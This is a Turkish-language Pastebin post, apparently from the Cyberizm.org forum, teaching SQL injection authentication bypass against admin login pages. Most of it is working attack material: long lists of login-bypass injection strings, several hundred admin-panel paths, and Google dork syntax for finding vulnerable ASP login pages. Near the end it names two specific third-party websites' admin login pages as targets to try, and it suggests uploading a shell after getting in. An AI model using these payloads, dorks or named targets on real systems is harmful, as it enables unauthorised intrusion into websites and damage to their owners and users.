Advertisement
KingSkrupellos

Sql Enjeksiyon Admin Authentication Login ByPass Tutorial

Dec 4th, 2017
422
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.96 KB | None | 0 0
  1. Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım
  2.  
  3. https://www.cyberizm.org/cyberizm-sql-enjeksiyon-admin-authentication-login-bypass-genis-resimli-videolu-anlatim-11517.html
  4.  
  5. Merhaba arkadaşlar ben KingSkrupellos. Forumda sevdiğim bir kardeşimin isteği üzerine yazdığım ve birçok kaynaktan alarak düzenlediğim bir dökümanı sizlerle paylaşmak istiyorum.Bu yöntemin bir diğer ismi Sql Injection Authentication Bypass’dır. Bugün size Admin Login Bypass yönteminde kullanılan admin/login.php yada SQL Injection Saldırısı veya Veritabanı saldırısı olarak ta bilinen ve halen birçok site için geçerli olan yönetim panelden SQL Saldırısı yani Login Bypass kodlarını sizlerle paylaşacağım. Genelde Windows sunucularında çalışan Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır.PHP tabanlı MySQL veritabanı kullanan siteler içinde geçerlidir bu saldırı. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir. Ek olarak Kullanıcının şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHP sitelere pek yapılmamaktadır.SQL Injection Saldırısının en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmektir. Bu saldırıyı deneme yanılma yolu ile yapabilirsiniz aşağıdaki kodları kullanarak. Yada bazen oluyor ki kullanıcının ismi admin ve şifresi ‘ or ‘1’=’1 ‘nide biz sql encekte ederek yönetici paneline girmiş oluyoruz. Tabi illa yöneticinin ismi admin olacak diye bir şey yok, ya bunu sql encekte ederek öğrenebiliriz yada site üzerinde biraz gezinti yaparak en üst düzey yöneticinin kim olduğunu da görebiliriz.
  6.  
  7. [img]http://i.hizliresim.com/o0g9vX.gif[/img]
  8.  
  9. Ayrıca konuya uygun bulduğum videolarıda sizinle paylaşıyım.
  10. [code]http://www.youtube.com/watch?v=ap2aNpO9GJs
  11. http://www.youtube.com/watch?v=OYpMMaSinlY
  12. http://www.youtube.com/watch?v=TUMYNBKwOGs
  13. http://www.youtube.com/watch?v=wDRCTy8tPUA
  14. http://www.youtube.com/watch?v=J8FOoTcnagM
  15. http://www.youtube.com/watch?v=16y2gvq__f0
  16. http://www.youtube.com/watch?v=pr8h-VUDMhE
  17. http://www.youtube.com/watch?v=QTUIqJUkXqY
  18. http://www.youtube.com/watch?v=3R0ENxHmRdM
  19. http://www.youtube.com/watch?v=HI7Ti9SU8es[/code]
  20. KingSkrupellos Cyberizm.Org
  21. ASP Siteler için SQL Injection Login Bypass
  22. [code]
  23. ' or '1'='1
  24. ' or 'x'='x
  25. ' or 0=0 --
  26. " or 0=0 --
  27. or 0=0 --
  28. ' or 0=0 #
  29. " or 0=0 #
  30. or 0=0 #
  31. ' or 'x'='x
  32. " or "x"="x
  33. ') or ('x'='x
  34. ' or 1=1--
  35. " or 1=1--
  36. or 1=1--
  37. ' or a=a--
  38. " or "a"="a
  39. ') or ('a'='a
  40. ") or ("a"="a
  41. hi" or "a"="a
  42. hi" or 1=1 --
  43. hi' or 1=1 --
  44. 'or'1=1'
  45. ==
  46. and 1=1--
  47. and 1=1
  48. ' or 'one'='one--
  49. ' or 'one'='one
  50. ' and 'one'='one
  51. ' and 'one'='one--
  52. 1') and '1'='1--
  53. admin' --
  54. admin' #
  55. admin'/*
  56. or 1=1--
  57. or 1=1#
  58. or 1=1/*
  59. ) or '1'='1--
  60. ) or ('1'='1--
  61. ' or '1'='1
  62. ' or 'x'='x
  63. ' or 0=0 --
  64. " or 0=0 --
  65. or 0=0 --
  66. ' or 0=0 #
  67. " or 0=0 #
  68. or 0=0 #
  69. ' or 'x'='x
  70. " or "x"="x
  71. ') or ('x'='x
  72. ' or 1=1--
  73. " or 1=1--
  74. or 1=1--
  75. ' or a=a--
  76. " or "a"="a
  77. ') or ('a'='a
  78. ") or ("a"="a
  79. hi" or "a"="a
  80. hi" or 1=1 --
  81. hi' or 1=1 --
  82. 'or'1=1'
  83. or 1=1
  84. or 1=1--
  85. or 1=1#
  86. or 1=1/*
  87. admin' --
  88. admin' #
  89. admin'/*
  90. admin' or '1'='1
  91. admin' or '1'='1'--
  92. admin' or '1'='1'#
  93. admin' or '1'='1'/*
  94. admin'or 1=1 or ''='
  95. admin' or 1=1
  96. admin' or 1=1--
  97. admin' or 1=1#
  98. admin' or 1=1/*
  99. admin') or ('1'='1
  100. admin') or ('1'='1'--
  101. admin') or ('1'='1'#
  102. admin') or ('1'='1'/*
  103. admin') or '1'='1
  104. admin') or '1'='1'--
  105. admin') or '1'='1'#
  106. admin') or '1'='1'/*
  107. admin" --
  108. admin" #
  109. admin"/*
  110. admin" or "1"="1
  111. admin" or "1"="1"--
  112. admin" or "1"="1"#
  113. admin" or "1"="1"/*
  114. admin"or 1=1 or ""="
  115. admin" or 1=1
  116. admin" or 1=1--
  117. admin" or 1=1#
  118. admin" or 1=1/*
  119. admin") or ("1"="1
  120. admin") or ("1"="1"--
  121. admin") or ("1"="1"#
  122. admin") or ("1"="1"/*
  123. admin") or "1"="1
  124. admin") or "1"="1"--
  125. admin") or "1"="1"#
  126. admin") or "1"="1"/*
  127. ' or 0=0 --
  128. admin
  129. ' or '1'='1
  130. ' or 1='1
  131. 1' or 1=1 -- -
  132. ' or '1'='1
  133. ' or ' 1=1
  134. 1' or 1=1 -- -
  135. ' or ' 1=1
  136. ' or '1'='1
  137. ''Or'='Or''
  138. 1'or'1'='1
  139. ' or 1=1 or ''='
  140. " or 1=1 or ""="
  141. ' OR ''='
  142. '' OR ''=''
  143. 'OR''='
  144. hey' or 1=1–
  145. ''Or 1 = 1'
  146. ' or 1=1--
  147. or 1=1--
  148. " or 1=1--
  149. or 1=1--
  150. ' or 'a'='a
  151. " or "a"="a
  152. ') or ('a'='a
  153. hi") or ("a"="a
  154. 'hi' or 'x'='x';
  155. x' or 1=1 or 'x'='y
  156. \x27\x4F\x52 SELECT *
  157. \x27\x6F\x72 SELECT *
  158. 'or select *
  159. admin'--
  160. ")) or (("x"))=(("x
  161. " or ""+"
  162. admin"or 1=1 or ""="
  163. admin") or ("1"="1"--[/code]
  164. ASP.NET(aspx) Siteler için Login Bypass
  165. [code]anything' OR 'x'='x[/code]
  166. Ve benim kendim oluşturduğum Administrator Login ByPass yöntemi kodları
  167. Bunları yönetici panelini bulup Kullanıcı adı ve Şifreyi bu kodlarla iki kez girmektir. Daha sonra admin panelindesiniz.
  168. [code]
  169. '-'
  170. ' '
  171. '&'
  172. '^'
  173. '*'
  174. ' or ''-'
  175. ' or '' '
  176. ' or ''&'
  177. ' or ''^'
  178. ' or ''*'
  179. "-"
  180. " "
  181. "&"
  182. "^"
  183. "*"
  184. " or ""-"
  185. " or "" "
  186. " or ""&"
  187. " or ""^"
  188. " or ""*"
  189. or true--
  190. " or true--
  191. ' or true--
  192. ") or true--
  193. ') or true--
  194. ' or 'x'='x
  195. ') or ('x')=('x
  196. ')) or (('x'))=(('x
  197. " or "x"="x
  198. ") or ("x")=("x
  199. ")) or (("x"))=(("x
  200. ' OR 'a' = 'a
  201. [/code]
  202. Kendime ait olup geliştirdiğim Login ByPass yöntemleride var onuda veriyim
  203. [code]'-'
  204. ' '
  205. '&'
  206. '^'
  207. '*'
  208. ' or ''-'
  209. ' or '' '
  210. ' or ''&'
  211. ' or ''^'
  212. ' or ''*'
  213. "-"
  214. " "
  215. "&"
  216. "^"
  217. "*"
  218. " or ""-"
  219. " or "" "
  220. " or ""&"
  221. " or ""^"
  222. " or ""*"
  223. or true--
  224. " or true--
  225. ' or true--
  226. ") or true--
  227. ') or true--
  228. ' or 'x'='x
  229. ') or ('x')=('x
  230. ')) or (('x'))=(('x
  231. " or "x"="x
  232. ") or ("x")=("x
  233. ")) or (("x"))=(("x
  234. ''Or'='Or''
  235. 1'or'1'='1
  236. ' or 1=1 or ''='
  237. " or 1=1 or ""="
  238. ' OR ''='
  239. '' OR ''=''
  240. 'OR''='
  241. hey' or 1=1–
  242. ''Or 1 = 1'
  243. ' or 1=1--
  244. or 1=1--
  245. " or 1=1--
  246. or 1=1--
  247. ' or 'a'='a
  248. " or "a"="a
  249. ') or ('a'='a
  250. hi") or ("a"="a
  251. 'hi' or 'x'='x';
  252. x' or 1=1 or 'x'='y
  253. \x27\x4F\x52 SELECT *
  254. \x27\x6F\x72 SELECT *
  255. 'or select *
  256. admin'--
  257. ")) or (("x"))=(("x
  258. " or ""+"
  259. admin"or 1=1 or ""="
  260. admin") or ("1"="1"--[/code]
  261. Örnek Admin Panelleri PHP,HTML,ASP VE ASPX kullanan sistemlerde
  262. [code]
  263. /login/web_manage.asp
  264. /login-admin.asp
  265. /adminlogin.asp
  266. /admin/adminLogin.asp
  267. /admin/login.php
  268. /admin/login.asp
  269. /admin/login.aspx
  270. /admin/login.html
  271. /admin
  272. /yonetim
  273. /panel
  274. /kontrolpanel
  275. /administrator
  276. /giris
  277. /login
  278. /superadmin
  279. /controlpanel
  280. /yonetici
  281. /giris.asp
  282. /yonetim.asp
  283. /login.asp
  284. /yonetici.asp
  285. /panel.asp[/code]
  286. Not => Dorklar her zaman geliştirilebilir, illa bu dorkları kullanılacak diye bir şey yok.Dorkların önüne inurl : inalltitle : allintext : gibi yazılarla çoğaltabilirsiniz.
  287.  
  288. [code]Login Dorks: "inurl:DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" where "DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" = aşağıdaki listeden seçebilirsiniz.
  289. Mesela şöyle olsun sayın cyberizm üyeleri
  290. [code]"inurl:admin.asp"
  291.  
  292. "inurl:login/admin.asp"
  293.  
  294. "inurl:admin/login.asp"
  295.  
  296. "inurl:adminlogin.asp"
  297.  
  298. "inurl:adminhome.asp"
  299.  
  300. "inurl:admin_login.asp"
  301.  
  302. "inurl:administratorlogin.asp"
  303.  
  304. "inurl:login/administrator.asp"
  305.  
  306. "inurl:administrator_login.asp"
  307. Diğerlerini de siz kendiniz önüne inurl : gibi yazarak çoğaltabilirsiniz.
  308. adm
  309. admincp
  310. admcp
  311. cp
  312. modcp
  313. moderatorcp
  314. adminare
  315. admins
  316. admin1.php
  317. admin1.html
  318. admin2.php
  319. admin2.html
  320. yonetim.php
  321. yonetim.html
  322. yonetici.php
  323. yonetici.html
  324. ccms/
  325. ccms/login.php
  326. ccms/index.php
  327. maintenance/
  328. webmaster/
  329. adm/
  330. configuration/
  331. configure/
  332. websvn/
  333. admin/
  334. admin/account.php
  335. admin/account.html
  336. admin/index.php
  337. admin/index.html
  338. admin/login.php
  339. admin/login.html
  340. admin/home.php
  341. admin/controlpanel.html
  342. admin/controlpanel.php
  343. admin.php
  344. admin.html
  345. administrator/
  346. administrator/index.html
  347. administrator/index.php
  348. administrator/login.html
  349. administrator/login.php
  350. administrator/account.html
  351. administrator/account.php
  352. administrator.php
  353. administrator.html
  354. login.php
  355. login.html
  356. modelsearch/login.php
  357. moderator.php
  358. moderator.html
  359. moderator/login.php
  360. moderator/login.html
  361. moderator/admin.php
  362. moderator/admin.html
  363. moderator/
  364. account.php
  365. account.html
  366. admincontrol.php
  367. admincontrol.html
  368. adminpanel.php
  369. adminpanel.html
  370. admin1.asp
  371. admin2.asp
  372. yonetim.asp
  373. yonetici.asp
  374. admin/account.asp
  375. admin/index.asp
  376. admin/login.asp
  377. admin/home.asp
  378. admin.asp
  379. administrator/index.asp
  380. administrator/login.asp
  381. administrator/account.asp
  382. administrator.asp
  383. login.asp
  384. modelsearch/login.asp
  385. moderator.asp
  386. moderator/login.asp
  387. moderator/admin.asp
  388. account.asp
  389. controlpanel.asp
  390. admincontrol.asp
  391. adminpanel.asp
  392. fileadmin/
  393. fileadmin.php
  394. fileadmin.asp
  395. fileadmin.html
  396. administration/
  397. administration.php
  398. administration.html
  399. sysadmin.php
  400. sysadmin.html
  401. phpmyadmin/
  402. myadmin/
  403. sysadmin.asp
  404. sysadmin/
  405. ur-admin.asp
  406. ur-admin.php
  407. ur-admin.html
  408. ur-admin/
  409. Server.php
  410. Server.html
  411. Server.asp
  412. Server/
  413. wp-admin/
  414. administr8.php
  415. administr8.html
  416. administr8/
  417. administr8.asp
  418. webadmin/
  419. webadmin.php
  420. webadmin.asp
  421. webadmin.html
  422. administratie/
  423. admins/
  424. admins.php
  425. admins.asp
  426. admins.html
  427. administrivia/
  428. Database_Administration/
  429. WebAdmin/
  430. useradmin/
  431. sysadmins/
  432. admin1/
  433. system-administration/
  434. administrators/
  435. pgadmin/
  436. directadmin/
  437. staradmin/
  438. ServerAdministrator/
  439. SysAdmin/
  440. administer/
  441. LiveUser_Admin/
  442. sys-admin/
  443. typo3/
  444. panel/
  445. cpanel/
  446. cPanel/
  447. cpanel_file/
  448. platz_login/
  449. rcLogin/
  450. blogindex/
  451. formslogin/
  452. autologin/
  453. support_login/
  454. meta_login/
  455. manuallogin/
  456. simpleLogin/
  457. loginflat/
  458. utility_login/
  459. showlogin/
  460. memlogin/
  461. members/
  462. login-redirect/
  463. sub-login/
  464. wp-login/
  465. login1/
  466. dir-login/
  467. login_db/
  468. xlogin/
  469. smblogin/
  470. customer_login/
  471. UserLogin/
  472. login-us/
  473. acct_login/
  474. admin_area/
  475. bigadmin/
  476. project-admins/
  477. phppgadmin/
  478. pureadmin/
  479. sql-admin/
  480. radmind/
  481. openvpnadmin/
  482. wizmysqladmin/
  483. vadmind/
  484. ezsqliteadmin/
  485. hpwebjetadmin/
  486. newsadmin/
  487. adminpro/
  488. Lotus_Domino_Admin/
  489. bbadmin/
  490. vmailadmin/
  491. Indy_admin/
  492. ccp14admin/
  493. irc-macadmin/
  494. banneradmin/
  495. sshadmin/
  496. phpldapadmin/
  497. macadmin/
  498. administratoraccounts/
  499. admin4_account/
  500. admin4_colon/
  501. radmind-1/
  502. Super-Admin/
  503. AdminTools/
  504. cmsadmin/
  505. SysAdmin2/
  506. globes_admin/
  507. cadmins/
  508. phpSQLiteAdmin/
  509. navSiteAdmin/
  510. server_admin_small/
  511. logo_sysadmin/
  512. server/
  513. database_administration/
  514. power_user/
  515. system_administration/
  516. ss_vms_admin_sm/
  517. adminarea/
  518. bb-admin/
  519. adminLogin/
  520. panel-administracion/
  521. instadmin/
  522. memberadmin/
  523. administratorlogin/
  524. admin/admin.php
  525. admin_area/admin.php
  526. admin_area/login.php
  527. siteadmin/login.php
  528. siteadmin/index.php
  529. siteadmin/login.html
  530. admin/admin.html
  531. admin_area/index.php
  532. bb-admin/index.php
  533. bb-admin/login.php
  534. bb-admin/admin.php
  535. admin_area/login.html
  536. admin_area/index.html
  537. admincp/index.asp
  538. admincp/login.asp
  539. admincp/index.html
  540. webadmin/index.html
  541. webadmin/admin.html
  542. webadmin/login.html
  543. admin/admin_login.html
  544. admin_login.html
  545. panel-administracion/login.html
  546. nsw/admin/login.php
  547. webadmin/login.php
  548. admin/admin_login.php
  549. admin_login.php
  550. admin_area/admin.html
  551. pages/admin/admin-login.php
  552. admin/admin-login.php
  553. admin-login.php
  554. bb-admin/index.html
  555. bb-admin/login.html
  556. bb-admin/admin.html
  557. admin/home.html
  558. pages/admin/admin-login.html
  559. admin/admin-login.html
  560. admin-login.html
  561. admin/adminLogin.html
  562. adminLogin.html
  563. home.html
  564. rcjakar/admin/login.php
  565. adminarea/index.html
  566. adminarea/admin.html
  567. webadmin/index.php
  568. webadmin/admin.php
  569. user.html
  570. modelsearch/login.html
  571. adminarea/login.html
  572. panel-administracion/index.html
  573. panel-administracion/admin.html
  574. modelsearch/index.html
  575. modelsearch/admin.html
  576. admincontrol/login.html
  577. adm/index.html
  578. adm.html
  579. user.php
  580. panel-administracion/login.php
  581. wp-login.php
  582. adminLogin.php
  583. admin/adminLogin.php
  584. home.php
  585. adminarea/index.php
  586. adminarea/admin.php
  587. adminarea/login.php
  588. panel-administracion/index.php
  589. panel-administracion/admin.php
  590. modelsearch/index.php
  591. modelsearch/admin.php
  592. admincontrol/login.php
  593. adm/admloginuser.php
  594. admloginuser.php
  595. admin2/login.php
  596. admin2/index.php
  597. adm/index.php
  598. adm.php
  599. affiliate.php
  600. adm_auth.php
  601. memberadmin.php
  602. administratorlogin.php
  603. admin/admin.asp
  604. admin_area/admin.asp
  605. admin_area/login.asp
  606. admin_area/index.asp
  607. bb-admin/index.asp
  608. bb-admin/login.asp
  609. bb-admin/admin.asp
  610. pages/admin/admin-login.asp
  611. admin/admin-login.asp
  612. admin-login.asp
  613. user.asp
  614. webadmin/index.asp
  615. webadmin/admin.asp
  616. webadmin/login.asp
  617. admin/admin_login.asp
  618. admin_login.asp
  619. panel-administracion/login.asp
  620. adminLogin.asp
  621. admin/adminLogin.asp
  622. home.asp
  623. adminarea/index.asp
  624. adminarea/admin.asp
  625. adminarea/login.asp
  626. panel-administracion/index.asp
  627. panel-administracion/admin.asp
  628. modelsearch/index.asp
  629. modelsearch/admin.asp
  630. admincontrol/login.asp
  631. adm/admloginuser.asp
  632. admloginuser.asp
  633. admin2/login.asp
  634. admin2/index.asp
  635. adm/index.asp
  636. adm.asp
  637. affiliate.asp
  638. adm_auth.asp
  639. memberadmin.asp
  640. administratorlogin.asp
  641. siteadmin/login.asp
  642. siteadmin/index.asp
  643. ADMIN/
  644. paneldecontrol/
  645. login/
  646. cms/
  647. admon/
  648. ADMON/
  649. administrador/
  650. ADMIN/login.php
  651. panelc/
  652. ADMIN/login.html
  653. admin.
  654. login.htm
  655. login.
  656. admin/login.htm
  657. admin/home.
  658. admin/controlpanel.htm
  659. admin/cp.
  660. admin/adminLogin.htm
  661. admin/admin_login.
  662. admin/controlpanel.
  663. admin/admin-login.
  664. admin-login.
  665. admin/account.
  666. admin/admin.
  667. admin.htm
  668. adminitem/
  669. adminitem.
  670. adminitems/
  671. adminitems.
  672. administrator/login.
  673. administrator.
  674. administration.
  675. adminlogin.
  676. admin_area/admin.
  677. admin_area/login.
  678. manager/
  679. manager.
  680. letmein/
  681. letmein.
  682. superuser/
  683. superuser.
  684. access/
  685. access.
  686. sysadm/
  687. sysadm.
  688. superman/
  689. supervisor/
  690. panel.
  691. control/
  692. control.
  693. member/
  694. member.
  695. members.
  696. user/
  697. user.
  698. cp/
  699. uvpanel/
  700. manage/
  701. manage.
  702. management/
  703. management.
  704. signin/
  705. signin.
  706. log-in/
  707. log-in.
  708. log_in/
  709. log_in.
  710. sign_in/
  711. sign_in.
  712. sign-in/
  713. sign-in.
  714. users/
  715. users.
  716. accounts/
  717. accounts.
  718. bb-admin/login.
  719. bb-admin/admin.
  720. administrator/account.
  721. relogin.htm
  722. relogin.html
  723. check.
  724. relogin.
  725. blog/wp-login.
  726. user/admin.
  727. users/admin.
  728. registration/
  729. processlogin.
  730. checklogin.
  731. checkuser.
  732. checkadmin.
  733. isadmin.
  734. authenticate.
  735. authentication.
  736. auth.
  737. authuser.
  738. authadmin.
  739. cp.
  740. modelsearch/login.
  741. moderator.
  742. controlpanel.
  743. admincontrol.
  744. adminpanel.
  745. fileadmin.
  746. sysadmin.
  747. admin1.
  748. admin1.htm
  749. admin2.
  750. yonetim.
  751. yonetici.
  752. ur-admin.
  753. Server.
  754. administr8.
  755. webadmin.
  756. admins.
  757. adm.
  758. admin_login.
  759. panel-administracion/login.
  760. pages/admin/admin-login.
  761. pages/admin/
  762. acceso.
  763. admincp/login.
  764. admincp/
  765. admincontrol/
  766. affiliate.
  767. adm_auth.
  768. memberadmin.
  769. administratorlogin.
  770. modules/admin/
  771. administrators.
  772. siteadmin/
  773. siteadmin.
  774. adminsite/
  775. kpanel/
  776. vorod/
  777. vorod.
  778. vorud/
  779. vorud.
  780. adminpanel/
  781. PSUser/
  782. secure/
  783. webmaster.
  784. autologin.
  785. userlogin.
  786. admin_area.
  787. cmsadmin.
  788. security/
  789. usr/
  790. root/
  791. secret/
  792. admin/login.
  793. admin/adminLogin.
  794. moderator/login.
  795. moderator/admin.
  796. 0admin/
  797. 0manager/
  798. aadmin/
  799. cgi-bin/login
  800. login1
  801. login_admin/
  802. login_admin
  803. login_out/
  804. login_out
  805. login_user
  806. loginerror/
  807. loginok/
  808. loginsave/
  809. loginsuper/
  810. loginsuper
  811. login
  812. logout/
  813. logout
  814. secrets/
  815. super1/
  816. super1
  817. super_index
  818. super_login
  819. supermanager
  820. superman
  821. superuser
  822. supervise/
  823. supervise/Login
  824. super[/code]
  825. Bunun yanında güncel dorkları ve exploitleri takip edebileceğiniz iki siteyi öneriyorum.
  826. [code]http://www.exploit-db.com/
  827. http://www.cxsecurity.com/[/code]
  828. İşte Size 2 site hediyem olsun. Bu sitelerde deneyebilirsiniz. Özellikle forumda sevdiğim kardeşime bir armağan olsun ve sizlere de tabiki Cyberizm.Org üyeleri.
  829. [code]http://www.sunmarytrust.org/adminlogin.asp
  830. http://www.preventivecardiology.in/adminlogin.asp
  831. [/code]
  832. Bunun yanında Fatcat Sql Injector Tool’u tavsiye ederim. Ayrıntılı bilgiyi bu link üzerinden öğrenebilirsiniz sayın arkadaşlar ve yeni olanlar, alanda zaten uzmanlaşanlar. Ben birşeye karşıyım arkadaş, herşey yeniler için değildir ve biz uzman olanlar içinde lazım oluyor bazen bu toollar yani. Neyse işte programın yada kodun ayrıntılı açıklamasını linkten öğrenebilirsiniz ama ingilizce.
  833. [code]http://www.chmag.in/article/mar2013/fatcat-v2-auto-sql-injector[/code]
  834. Ayrıca bu sitede İngilizce olarak resimli benim dediğime benzer resimli olarak anlatılmıştır. Takip edebilirsiniz.
  835. [code]http://www.kanishkashowto.com/2013/08/09/website-hacking-login-bypass-using-sql-injection-2/[/code]
  836. Sql Enjeksiyon ile Login ByPass yapılışı
  837. [code]http://www.sechow.com/bricks/docs/login-1.html[/code]
  838. Ayrıca güvendiğim sitelerden birisi olan bu siteden BurpSuite programıyla SQL enjekte edip login bypass olup admin paneline dalıp Shell yükleyebilirsiniz.
  839. [code]https://www.architectingsecurity.com/2012/04/23/pentesting-of-authentication-bypass-via-sql-injection-with-burpsuite-intruder/[/code]
  840. Bu linklerden de nasıl sql enjekte edilipde login bypass yaptığımız görelim.
  841. [code]http://priyahackingarticles.blogspot.com.tr/2011/03/bypass-website-login-by-sql-injection.html[/code]
  842. Not => Çok uzun oldu farkındayım ama olması gerekiyor. Neyse bu kadar anlatım yeter. Yazasıya kadar ellerim yoruldu. Hatta kollarıma ağrı girdi. Üzerine ekleme yapabilirim. Anlamayan olursa pm’le yada konu altında anlamaydığı yeri sorabilir. KingSkrupellos Cyberizm.Org.Lütfen Emeğe Saygı. Hadi görüşürüz bir sonraki makalede.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement